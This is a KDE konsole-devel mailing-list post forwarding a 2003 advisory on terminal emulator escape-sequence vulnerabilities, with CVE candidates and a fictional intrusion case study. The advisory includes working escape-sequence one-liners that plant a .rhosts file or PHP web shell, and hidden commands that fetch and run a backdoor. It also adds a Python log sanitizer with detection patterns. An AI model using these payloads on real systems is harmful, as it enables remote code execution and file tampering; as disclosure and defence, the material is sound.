I am happy to report that in the following report no security issues were found for konsole.

Let's make sure we keep it that way :-)

Cheers,
Waldo
--
bastian@kde.org  -=|[ SuSE, The Linux Desktop Experts ]|=-  bastian@suse.com

---------- Forwarded message: H D Moore : Terminal Emulator Security Issues ----------

From: H D Moore
To: vulnwatch@vulnwatch.org, bugtraq@securityfocus.com, full-disclosure@lists.netsys.com
Subject: Terminal Emulator Security Issues
Date: Mon, 24 Feb 2003 15:02:52 -0600
Message-Id: <200302241502.52947.termulation@digitaloffense.net>
Please see the attached document, also available at the following URL:

http://www.digitaldefense.net/labs/

----------------------------------------------------------

TERMINAL EMULATOR SECURITY ISSUES
Copyright © 2003 Digital Defense Incorporated
All Rights Reserved

[ Table of Contents ]

-- Summary
-- Disclaimer
-- Escape Sequences
-- Remote Exploitation
-- Screen Dumping
-- Window Title Reporting
-- Miscellaneous Issues
-- Terminal Defense
-- Tested Emulator Versions
-- Vulnerability Index
-- A Fictitious Case Study
-- References
-- Credits

(Attachment: Termulation.txt)

[ Summary ]

Many of the features supported by popular terminal emulator software can be abused when untrusted data is displayed on the screen. The impact of this abuse can range from annoying screen garbage to a complete system compromise. All of the issues below are actually documented features; anyone who takes the time to read over the man pages or source code could use them to carry out an attack.

[ Disclaimer ]

There is nothing new in this paper. The entire concept of exploiting a terminal by supplying hostile input has been around for over 10 years now.
Unix veterans and BBS users have been exposed to this type of problem since the very beginning; a newsgroup search can turn up all sorts of exploits, from the ever-popular "flash" program to the abuse of logging features in xterm which were disabled in R5. Therefore the purpose of this paper is to identify weaknesses in the current suite of popular terminal emulation software, not to rehash an ancient problem.

[ Escape Sequences ]

Typically, an escape sequence is a series of characters starting with the ASCII escape character (0x1B) and followed by a specific set of arguments. Escape sequences were originally used to control display devices such as dumb terminals and have been extended to allow various forms of interaction with modern operating systems. An escape sequence might be used to change text attributes (color, weight), move the cursor position, reconfigure the keyboard, update the window title, or manipulate the printer. Over the years, many new features have been added that required enhancements to the terminal emulator applications to support them.

[ Remote Exploitation ]

To exploit an escape sequence feature, an attacker must be able to display arbitrary data to the victim's terminal emulator. While at first glance that may seem rather unlikely, the attacker can take advantage of a number of small bugs in other applications to increase their chance of success.

Just about every network service that uses syslog will pass remote data directly to the daemon without filtering the escape character. The responsibility then lies on the syslog daemon to strip the escape code before writing the log entry to the disk or terminal. Although both the stock *BSD syslog daemons as well as the sysklogd package filter escape sequences, msyslog, syslog-ng, and the logging daemons supplied with many commercial UNIX-based operating systems do not.
While sending data directly to a vulnerable syslogd or rwalld service is the most direct form of attack, there are literally dozens of other ways to place hostile binary data onto the terminal of a remote user. The Apache web server makes an effort to clean garbage from its access logs, but it still allows escape characters to be injected into the error logs. Many command-line network tools can be exploited by a hostile service response; some examples include wget, curl, ftp, and telnet.

Multi-user systems are especially vulnerable, as any user can send a system-wide message under the default configuration of most operating systems. Placing the attack data into the banner of a popular FTP server, telnet service, or message of the day file will increase the chance of finding a valid target. Certain console email clients refuse to display files when the content-type of an attachment is set to an unrecognized value, so the user must save the file and then read it on the command line, often just using the standard "cat" utility.

[ Screen Dumping ]

Eterm and rxvt both implement what they call the "screen dump" feature. This escape sequence will cause an arbitrary file to be opened and filled with the current contents of the terminal window. These are the only two tested emulators[1] that still had the ability to write to files enabled by default. Although rxvt will ignore dump requests for existing files, Eterm[2] will happily delete the file and then create it again. Although it is technically the same feature, the OSC code used to trigger it is different between the two emulators. For rxvt, the screen dump code is 55; for Eterm, it is 30.
It is possible to control the entire contents of the file by specifying the reset sequence, then the required data, followed by the screen dump command.

    $ echo -e "\ec+ +\n\e];/home/user/.rhosts\a"

The same approach can be used to create an authorized_keys file for SSH, a replacement passwd file, or even a hostile PHP script written to the user's web directory. This attack requires no interaction on the part of the user and would be very difficult to detect if done correctly. The primary difference between this issue and some of the others mentioned in this paper is that the actual "exploitation" happens on the system running the emulator software, not the current system that the terminal is accessing. The code that is responsible for opening the dump file is shown below.

    /* rxvt: O_EXCL makes the open fail if the file already exists */
    if ((fd = open(str, O_RDWR | O_CREAT | O_EXCL, 0600)) >= 0)

    /* Eterm: the file is removed first, so O_EXCL never refuses */
    unlink(fname);
    outfd = open(fname, O_CREAT | O_EXCL | O_NDELAY | O_WRONLY, S_IRUSR | S_IWUSR);

[1] XFree86's xterm disabled an equivalent feature in X11R5 due to security concerns. It can still be enabled with a compile-time option.

[2] Eterm actually disabled this in 0.9.2 (October 31, 2002), however many recent Linux distributions still shipped with 0.9.1.

[ Window Title Reporting ]

One of the features which most terminal emulators support is the ability for the shell to set the title of the window using an escape sequence. This feature was originally implemented by DEC for DECterm and has since been added to most emulators in use today. The easy way to set the window title of a terminal is using the echo command:

    $ echo -e "\e]2;This is the new window title\a"

When the output of the above command is displayed on the terminal, it will set the window title to that string.
Setting the window title by itself is not much of a security issue; however, certain xterm variants (and dtterm) also provide an escape sequence for reporting the current window title. This essentially takes the current title and places it directly on the command line. Due to the way that most emulators process the escape sequence, it is not possible to embed a carriage return into the window title itself, so the user would need to hit enter for it to process the title as a command. The escape sequence for reporting the window title is:

    $ echo -e "\e[21t"

At this point, the attacker needs to convince the user to hit enter for the "exploit" to succeed. There are a number of techniques available to both hide the command and encourage the user to "press enter to continue". The simplest is to just insert a prompt followed by the "invisible" character attribute right before reporting the title. Another method is to set the foreground and background colors to be the same (all black or white) and hope the user hits the enter key when trying to determine what happened. The following example for xterm demonstrates a sequence that downloads and executes a backdoor while hiding the command line. The "Press Enter >" string should be changed to something appropriate for the attack vector. Some likely candidates include "wget internal error: press enter to continue" or "Error: unknown TERM, hit enter to continue".

    $ echo -e "\e]2;;wget 127.0.0.1/.bd;sh .bd;exit;\a\e[21t\e]2;xterm\aPress Enter>\e[8m;"

Any terminal emulator that allows the window title to be placed on the command-line is vulnerable to this attack. The applications which were confirmed vulnerable include xterm, dtterm, uxterm, rxvt, aterm, Eterm, hanterm, and putty[1]. The tested applications that did not allow the title to be written include gnome-terminal 2.0, konsole, SecureCRT, and aterm.
[1] Although putty would place the title onto the command-line, we were not able to find a method of hiding the command, since neither the "invisible" character attribute nor the foreground color could be set. Putty has a relatively low limit to the number of characters that can be placed into the window title, so it is not possible to simply flood the screen with garbage and hope the command rolls past the current view.

[ Miscellaneous Issues ]

Eterm should be given an award for the "Easiest to Compromise" terminal emulator. The developers based much of their code off of the rxvt and xterm source, so Eterm tends to share the same problems as those two emulators as well. If you happen to be running a CVS version of Eterm from between February 10th and May 8th of 2001, it was possible to execute an arbitrary command just by displaying the following escape sequence:

    $ echo -e "\e]6;73;command\a"

Fortunately, this feature never made it into an official release; the "fork-and-exec" ability was replaced by the script action spawn() instead.

During the research process, a number of small bugs were found that would either lock up the emulator completely or crash it. Although they can be disregarded as simple denial of service attacks, they could be abused to prevent an administrator from seeing subsequent logs during a compromise. In general, the code which processed application-side input seemed to place little emphasis on sanitizing the data before passing it directly to system-level functions. While there was some effort made to avoid standard buffer overflows, much of the loop-based character processing appeared ripe for a denial of service attack.
An example of this is a bug in the DEC UDK processing of XFree86's xterm application; the following command will place the process into a tight resource-eating loop:

    $ echo -e "\eP0;0|0A/17\x9c"

This bug was reported to xfree86@xfree86.org on December 17th, 2002 and no response was received as of the publication of this writing. The hanterm application is also vulnerable to this issue, as the code base started off as a direct copy of xterm.

Both rxvt and aterm support a feature known as the menuBar. This feature allows the user to create drop-down menus at the top of the terminal screen using both menu configuration files and escape sequences. Anyone able to display data on the terminal could modify the menu entries in a way that would compromise the system when accessed. This type of attack relies more on social engineering, but still provides a potential entry point when nothing else is available. The example below will create a new top-level menu item called "Special" with a single item labeled "Access"; when clicked it will download and execute a backdoor from http://127.0.0.1/.bd and exit the shell.

    $ echo -e "\e]10;[:/Special/{Access} wget 127.0.0.1/.bd\rsh bd\rexit\r:]\a\e]10;[show]\a"

[ Terminal Defense ]

The ideal solution is to sanitize all data before displaying it on your terminal; however, without a custom terminal application or data filter, you can't guarantee that every tool you use on the command-line is going to strip escape sequences. The responsibility should rest on the actual terminal emulator; any features that allow file or command-line access should be disabled by default and more attention should be paid to new features that implement any use of escape sequences.
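The escape filtering that the Remote Exploitation section credits to the BSD syslog daemons, and the data filter this section calls for, as an added example that is not code from the paper or from any syslog implementation: a scanner that strips 7-bit and 8-bit escape sequences from a log line before it reaches a terminal, and names the sequences the paper ties to file or command-line access (OSC 30/55 screen dumps, OSC 10 menuBar, CSI ... t window operations, DCS strings) so they can be alerted on. It assumes the raw 8-bit byte stream syslogd sees; the sample lines are constructed.

```python
# Added example, not code from the paper or from any syslogd. Assumption: input is the
# raw 8-bit byte stream syslogd sees (Latin-1 era); for UTF-8 logs drop the C1 rewrite
# in sanitize_log_line, because bytes 0x80-0x9F are continuation bytes there.
ESC, BEL, ST8 = 0x1B, 0x07, 0x9C
C1_TO_7BIT = {0x90: b"P", 0x98: b"X", 0x9B: b"[", 0x9D: b"]", 0x9E: b"^", 0x9F: b"_"}
STRING_KINDS = {0x50: "DCS", 0x58: "SOS", 0x5D: "OSC", 0x5E: "PM", 0x5F: "APC"}
RISKY_OSC = {b"30": "Eterm screen dump (OSC 30)", b"55": "rxvt screen dump (OSC 55)",
             b"10": "rxvt/aterm menuBar update (OSC 10)"}  # file/command access per the paper

def _string_end(data, i):
    # A control string body ends at BEL, 8-bit ST or ESC \ ; unterminated: swallow the rest.
    n = len(data)
    while i < n:
        if data[i] in (BEL, ST8):
            return i + 1
        if data[i] == ESC and i + 1 < n and data[i + 1] == 0x5C:
            return i + 2
        i += 1
    return n

def _sequence_end(data, i):
    # data[i] is ESC; returns (kind, j) such that data[i:j] is the whole sequence.
    n = len(data)
    c = data[i + 1] if i + 1 < n else 0
    if c == 0x5B:  # CSI: parameter/intermediate bytes 0x20-0x3F, then one final byte
        j = i + 2
        while j < n and 0x20 <= data[j] <= 0x3F:
            j += 1
        return "CSI", min(j + 1, n)
    if c in STRING_KINDS:
        return STRING_KINDS[c], _string_end(data, i + 2)
    j = i + 1  # plain escape such as ESC c (RIS): optional intermediates, one final byte
    while j < n and 0x20 <= data[j] <= 0x2F:
        j += 1
    return "ESC", min(j + 1, n)

def risk_label(kind, raw):
    # Name the paper's issue class for a stripped sequence; None for cosmetic ones.
    if kind == "OSC":
        return RISKY_OSC.get(raw[2:].split(b";", 1)[0])
    if kind == "CSI" and raw.endswith(b"t"):
        return "window title report/manipulation (CSI ... t)"
    if kind == "DCS":
        return "DCS string (DEC UDK processing path)"
    return None

def sanitize_log_line(line):
    # Returns (clean, alerts): sequences removed, leftover control bytes in caret notation.
    for c1, seven in C1_TO_7BIT.items():
        line = line.replace(bytes([c1]), b"\x1b" + seven)
    out, alerts, i, n = bytearray(), [], 0, len(line)
    while i < n:
        b = line[i]
        if b == ESC:
            kind, j = _sequence_end(line, i)
            alerts.append(risk_label(kind, line[i:j]))
            i = j
            continue
        if b == 0x09 or 0x20 <= b < 0x7F or b >= 0xA0:
            out.append(b)  # printable (tab and the Latin-1 high half kept as-is)
        else:              # C0/C1 control or DEL: vis(3)-style caret notation
            out += (b"^" if b < 0x80 else b"M-^") + bytes([(b & 0x7F) ^ 0x40])
        i += 1
    return bytes(out), [a for a in alerts if a]

# Constructed log lines carrying the paper's sequences (not real captures)
SAMPLES = [
    b"sshd[4112]: Invalid user \x1b]2;xterm\x07\x1b[21tPress Enter>\x1b[8m from 192.0.2.7",
    b"\x1bP0;0|0A/17\x9c",                                  # xterm DEC UDK loop
    b"\x1bcpayload line\n\x1b]30;/home/user/.rhosts\x07",   # reset, data, Eterm screen dump
]
```

Running sanitize_log_line over SAMPLES leaves only the printable text of each line and reports the title-report, DCS and screen-dump sequences respectively.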
The tested terminal emulators that were not susceptible to the screen dump or window title attacks include KDE's konsole, Gnome's gnome-terminal, Vandyke's SecureCRT, and Sasha Vasko's aterm. Konsole and gnome-terminal each use their own independent code-base and didn't try to support the same massive feature set as the others. SecureCRT took a similar approach, emulating just the minimum needed to be usable. With aterm, the code was originally based on rxvt; however, many of the dangerous features were removed as the project progressed.

[ Tested Emulator Versions ]

    xterm:          xf86 4.2.0 (patch 165)
    aterm:          0.42
    rxvt:           2.7.8
    Eterm:          0.9.1
    konsole:        3.1.0 rc5
    putty:          0.53
    SecureCRT:      3.4.6
    gnome-terminal: 2.0.2 (libzvt 2.0.1) [2.2 indirectly]
    hanterm-xf:     2.0

[ Vulnerability Index ]

The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned CVE candidate names for all issues described in this paper.

    CAN-2003-0020  Apache Error Log Escape Sequence Injection
    CAN-2003-0021  Screen Dump: Eterm
    CAN-2003-0022  Screen Dump: rxvt
    CAN-2003-0063  Window Title Reporting: xterm
    CAN-2003-0064  Window Title Reporting: dtterm
    CAN-2003-0065  Window Title Reporting: uxterm
    CAN-2003-0066  Window Title Reporting: rxvt
    CAN-2003-0067  Window Title Reporting: aterm
    CAN-2003-0068  Window Title Reporting: eterm
    CAN-2003-0069  Window Title Reporting: putty
    CAN-2003-0070  Window Title Reporting: gnome-terminal
    CAN-2003-0078  Window Title Reporting: hanterm-xf
    CAN-2003-0071  DEC UDK Processing DoS: xterm
    CAN-2003-0079  DEC UDK Processing DoS: hanterm-xf
    CAN-2003-0023  Menubar Manipulation: rxvt
    CAN-2003-0024  Menubar Manipulation: aterm

[ A Fictitious Case Study ]

Jim is the sole administrator for the web server farm at a moderately sized ISP. Most of his company's clients maintain their own sites and Jim's primary responsibility is to keep the web servers online and secured.
Jim spends some of his spare time dabbling with PHP and uses his workstation as his development system. The workstation is on the same network segment as the rest of the servers and the firewall only allows TCP port 80 and 443 inbound. Jim has a new 2.5Ghz P4 and finally has enough processing power to run the Enlightenment window manager with all the tweaks. His favorite part about Enlightenment is the terminal emulator, Eterm, which lets him make the background transparent and do all sorts of imaging tricks. Jim keeps a tail process running for the error_log files on each server he manages, allowing him to easily spot script bugs and misconfigurations before the customer calls him to fix it.

Andre is pissed. Some "friends" from his old hacking group have posted some embarrassing photos of him on the group's home page. The page is hosted in the ~user directory on a web server at some dinky ISP his old friend uses. He starts poking at the web server only to give up about 30 minutes later after failing to find a single vulnerable CGI or outdated service. He starts up Nmap again, this time on the whole class C that the web server resides in, determined to take down the entire subnet if he has to. He finds another web server; this one is running a traceroute gateway that is vulnerable to meta-character injection. Andre manages to get an outbound shell back to a bounce system and proceeds to poke around. He finds what appears to be an OpenSSH public key in the /tmp directory, named JimH.pub. Looking at the key file, he sees that the userid stored in it is for jim@jimsbox.weeisp.com.
A quick check shows that jimsbox.weeisp.com not only resolves to an external address, but is also running a web server.

The index page of Jim's web server consists of a couple pictures of him, some links to his favorite news sites, some screenshots of his new super-leet desktop, and some of his latest PHP projects. The first PHP project link Andre clicks on immediately starts spewing errors, complaining about not being able to connect to the database. The error message itself is interesting though, since it contains the full path to the script that triggered the error. Andre makes a quick note of this and keeps digging around, hoping for an easy entry point. As soon as he pulls up the desktop screen shots, he knows he struck gold. The screen shot not only shows a scantily clad Italian model in the background, but an Eterm open tailing the logs of the same server his pictures are being served from. He gets to work, hitting the workstation with every tool he can find, but an hour later he still hasn't busted a shell. While looking through the screenshots again, Andre gets the idea to look at the Eterm documentation and see what other features it supports. Not only is the documentation easy to read with plenty of examples, but it mentions an interesting feature described as a "screen dump".

About two hours later, Andre finally manages to get Eterm and its 60 megabytes of support libraries compiled. He discovers that to force Eterm to write out a file, all he has to do is display a certain sequence of characters to the screen. The question now is how to get those characters onto that Eterm at 4:30 in the morning. After a quick review of the Apache source code, he finally finds a spot in the error handling code where he can inject arbitrary data into the log files.
All he has to do is send a request for a file with the escape sequence he wants to use and Apache will write the unfiltered data directly to the log file.

Now that he can write arbitrary files to the workstation, he has to find a method of using it to gain access. Andre is pretty sure that the workstation is running SSH, but the only ports available are 80 and 443. He remembers that the PHP errors he saw earlier provided the full path to the web root; if he can write files there, then he can run commands through the web server. Five minutes later, Andre is connecting to the target web server and sending a GET request for a string generated with the following command:

    $ echo -e "\ec\e]30;/home/www/htdocs/owned.php\a"

This command clears the current screen buffer, displays his hostile PHP code to the screen, and then uses the screen dump command to write it into the web root. He points his browser to http://jimsbox.weeisp.com/owned.php?c=id and starts the process of rooting Jim's workstation, stealing his SSH keys, and taking those horrid pictures (as well as the rest of the group's files) off of that web server.
[ References ]

This Paper and Associated Tools
--- http://www.digitaldefense.net/labs/whitepapers.html
--- http://www.digitaldefense.net/labs/securitytools.html

Recognized Escape Sequences
--- Eterm: http://www.eterm.org/docs/view.php?doc=ref
--- xterm: http://rtfm.etla.org/xterm/ctlseq.html
--- dtterm: http://hpc.uky.edu/cgi-bin/man.cgi?section=all&topic=dtterm
--- rxvt: http://www.rxvt.org/refer/rxvtRef.html

Solar Designer's Post on Syslog Filtering
--- http://marc.theaimsgroup.com/?l=bugtraq&m=96938656931350

ADM's "The Evil Escape Sequences"
--- http://www.attrition.org/security/advisory/ADM/adm.evil.esc.advisory

AmigaOS Escape Sequence Exploits
--- http://www.abraxis.co.uk/SA-2001-11-08.html

MS-DOS/Windows Key Redefinition
--- http://lists.insecure.org/lists/bugtraq/1994/Jul/0029.html

Multiple Emulator Window Resize DoS
--- http://archives.neohapsis.com/archives/bugtraq/2000-05/0409.html
--- http://groups.google.com/groups?selm=E12zFeu-00075I-00%40ixion

The Original "Flash"
--- http://www.parallaxresearch.com/files/unix/exploits/flash.c
--- http://groups.google.com/groups?selm=342k7c%243ne%40news.ysu.edu
--- http://www.phrack-dont-give-a-shit-about-dmca.org/show.php?p=47&a=4

[ Credits ]

This paper was written by H D Moore, with much help from the rest of the Digital Defense Operations Team. I would like to thank Solar Designer for providing some great feedback on the original draft and Mark Cox for handling the CVE candidate generation and vendor coordination.

-------------------------------------------------------

_______________________________________________
konsole-devel mailing list
konsole-devel@mail.kde.org
http://mail.kde.org/mailman/listinfo/konsole-devel